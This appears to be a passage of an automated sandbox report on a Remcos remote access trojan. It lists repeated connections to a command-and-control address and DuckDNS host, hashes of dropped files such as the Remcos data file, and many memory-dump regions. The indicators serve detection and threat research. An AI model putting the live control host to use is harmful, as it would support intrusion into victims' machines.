| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | tcp | |
| CO | 181.142.162.155:4576 | tcp | |
| CO | 181.142.162.155:4576 | tcp | |
| CO | 181.142.162.155:4576 | tcp | |
| CO | 181.142.162.155:4576 | tcp | |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | tcp | |
| CO | 181.142.162.155:4576 | tcp | |
| CO | 181.142.162.155:4576 | tcp | |
| CO | 181.142.162.155:4576 | tcp | |
| CO | 181.142.162.155:4576 | tcp |
Files
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ck4s2lbx.thz.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/3544-8-0x0000019FB0280000-0x0000019FB02A2000-memory.dmp
memory/3544-9-0x00007FFC76830000-0x00007FFC772F2000-memory.dmp
memory/3544-10-0x0000019FB0270000-0x0000019FB0280000-memory.dmp
memory/3544-11-0x0000019FB0270000-0x0000019FB0280000-memory.dmp
memory/3544-12-0x0000019FB0270000-0x0000019FB0280000-memory.dmp
memory/3544-13-0x0000019FB0FB0000-0x0000019FB1756000-memory.dmp
memory/3544-15-0x0000019FB0310000-0x0000019FB031C000-memory.dmp
memory/3544-16-0x0000019FB0C30000-0x0000019FB0CA6000-memory.dmp
memory/3544-17-0x0000019FB0D70000-0x0000019FB0D8E000-memory.dmp
memory/1064-18-0x00007FFC76830000-0x00007FFC772F2000-memory.dmp
memory/1064-20-0x0000014D6A1D0000-0x0000014D6A1E0000-memory.dmp
memory/1064-19-0x0000014D6A1D0000-0x0000014D6A1E0000-memory.dmp
memory/1064-29-0x0000014D6A1D0000-0x0000014D6A1E0000-memory.dmp
memory/1064-34-0x00007FFC76830000-0x00007FFC772F2000-memory.dmp
memory/1916-35-0x0000000000400000-0x0000000000482000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | 88dc70c361a22feac57b031dd9c1f02f |
| SHA1 | a9b4732260c2a323750022a73480f229ce25d46d |
| SHA256 | 43244c0820ec5074e654ecd149fa744f51b2c1522e90285567713dae64b62f59 |
| SHA512 | 19c0532741ebc9751390e6c5ca593a81493652f25c74c8cab29a8b5b1f1efef8d511254a04f50b0c4a20724bae10d96d52af7a76b0c85ddc5f020d4cac41100c |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 5746a9547ca0d2ff66b8de81e48ddc64 |
| SHA1 | 6e9cdbbdb0c65caf97fbcd8787d67749b55a6b5f |
| SHA256 | eedb2133a9344f6d8fdc81f8fd710954c165e8d88d9516be400f8a94132a8982 |
| SHA512 | f707a525cbb18c297badc0f1187f71aea9b650c7cfdc3ee727093adfa2cab1a83550b842d666e840b6099ccaa4acb5694567317cd62f10359298f720785f0a31 |
memory/1916-39-0x0000000000400000-0x0000000000482000-memory.dmp
memory/3544-40-0x00007FFC76830000-0x00007FFC772F2000-memory.dmp
memory/1916-41-0x0000000000400000-0x0000000000482000-memory.dmp
memory/1916-43-0x0000000000400000-0x0000000000482000-memory.dmp
memory/1916-44-0x0000000000400000-0x0000000000482000-memory.dmp
memory/1916-46-0x0000000000400000-0x0000000000482000-memory.dmp
memory/1916-47-0x0000000000400000-0x0000000000482000-memory.dmp
memory/1916-48-0x0000000000400000-0x0000000000482000-memory.dmp
memory/1916-49-0x0000000000400000-0x0000000000482000-memory.dmp
memory/1916-50-0x0000000000400000-0x0000000000482000-memory.dmp
memory/1916-51-0x0000000000400000-0x0000000000482000-memory.dmp
memory/1916-52-0x0000000000400000-0x0000000000482000-memory.dmp
memory/1916-53-0x0000000000400000-0x0000000000482000-memory.dmp
memory/1916-54-0x0000000000400000-0x0000000000482000-memory.dmp
memory/1916-55-0x0000000000400000-0x0000000000482000-memory.dmp
memory/1916-57-0x0000000000400000-0x0000000000482000-memory.dmp
memory/1916-58-0x0000000000400000-0x0000000000482000-memory.dmp
memory/1916-59-0x0000000000400000-0x0000000000482000-memory.dmp
memory/1916-60-0x0000000000400000-0x0000000000482000-memory.dmp
memory/1916-61-0x0000000000400000-0x0000000000482000-memory.dmp
memory/1916-62-0x0000000000400000-0x0000000000482000-memory.dmp
memory/1916-64-0x0000000000400000-0x0000000000482000-memory.dmp
memory/1916-65-0x0000000000400000-0x0000000000482000-memory.dmp
memory/1916-66-0x0000000000400000-0x0000000000482000-memory.dmp
memory/1916-67-0x0000000000400000-0x0000000000482000-memory.dmp
memory/1916-68-0x0000000000400000-0x0000000000482000-memory.dmp
memory/1916-69-0x0000000000400000-0x0000000000482000-memory.dmp
memory/1916-70-0x0000000000400000-0x0000000000482000-memory.dmp
memory/1916-72-0x0000000000400000-0x0000000000482000-memory.dmp
memory/1916-73-0x0000000000400000-0x0000000000482000-memory.dmp
memory/1916-74-0x0000000000400000-0x0000000000482000-memory.dmp
memory/1916-75-0x0000000000400000-0x0000000000482000-memory.dmp
memory/1916-76-0x0000000000400000-0x0000000000482000-memory.dmp
memory/1916-77-0x0000000000400000-0x0000000000482000-memory.dmp
memory/1916-78-0x0000000000400000-0x0000000000482000-memory.dmp
memory/1916-80-0x0000000000400000-0x0000000000482000-memory.dmp
memory/1916-81-0x0000000000400000-0x0000000000482000-memory.dmp
memory/1916-82-0x0000000000400000-0x0000000000482000-memory.dmp
memory/1916-83-0x0000000000400000-0x0000000000482000-memory.dmp
memory/1916-84-0x0000000000400000-0x0000000000482000-memory.dmp
memory/1916-85-0x0000000000400000-0x0000000000482000-memory.dmp
memory/1916-86-0x0000000000400000-0x0000000000482000-memory.dmp
C:\ProgramData\remcos\registros.dat
| MD5 | da07760c88eb4c4e2b3fca9b87fc5972 |
| SHA1 | 27cba49a2c23c3a00f6226043661e09ee3e23f63 |
| SHA256 | c1cc350e3f0c1de9cd84dc402a2a8f3acdf6a0e7a5a7a9700339d8633312f74d |
| SHA512 | 8a76c611ae15b9c7c7faf061966c7c80a4ced75b77d652c8b09af44dc27b23bbfd9544992a9a34c64753c3ad420251e58d3b1743c8f8e64b22027f654e059842 |
memory/1916-88-0x0000000000400000-0x0000000000482000-memory.dmp
memory/1916-89-0x0000000000400000-0x0000000000482000-memory.dmp
memory/1916-90-0x0000000000400000-0x0000000000482000-memory.dmp
memory/1916-91-0x0000000000400000-0x0000000000482000-memory.dmp
memory/1916-92-0x0000000000400000-0x0000000000482000-memory.dmp
memory/1916-93-0x0000000000400000-0x0000000000482000-memory.dmp
memory/1916-94-0x0000000000400000-0x0000000000482000-memory.dmp
memory/1916-96-0x0000000000400000-0x0000000000482000-memory.dmp
memory/1916-97-0x0000000000400000-0x0000000000482000-memory.dmp
memory/1916-98-0x0000000000400000-0x0000000000482000-memory.dmp
memory/1916-99-0x0000000000400000-0x0000000000482000-memory.dmp
memory/1916-100-0x0000000000400000-0x0000000000482000-memory.dmp
memory/1916-101-0x0000000000400000-0x0000000000482000-memory.dmp
memory/1916-102-0x0000000000400000-0x0000000000482000-memory.dmp
memory/1916-103-0x0000000000400000-0x0000000000482000-memory.dmp
memory/1916-105-0x0000000000400000-0x0000000000482000-memory.dmp
memory/1916-106-0x0000000000400000-0x0000000000482000-memory.dmp
memory/1916-107-0x0000000000400000-0x0000000000482000-memory.dmp
memory/1916-108-0x0000000000400000-0x0000000000482000-memory.dmp
memory/1916-109-0x0000000000400000-0x0000000000482000-memory.dmp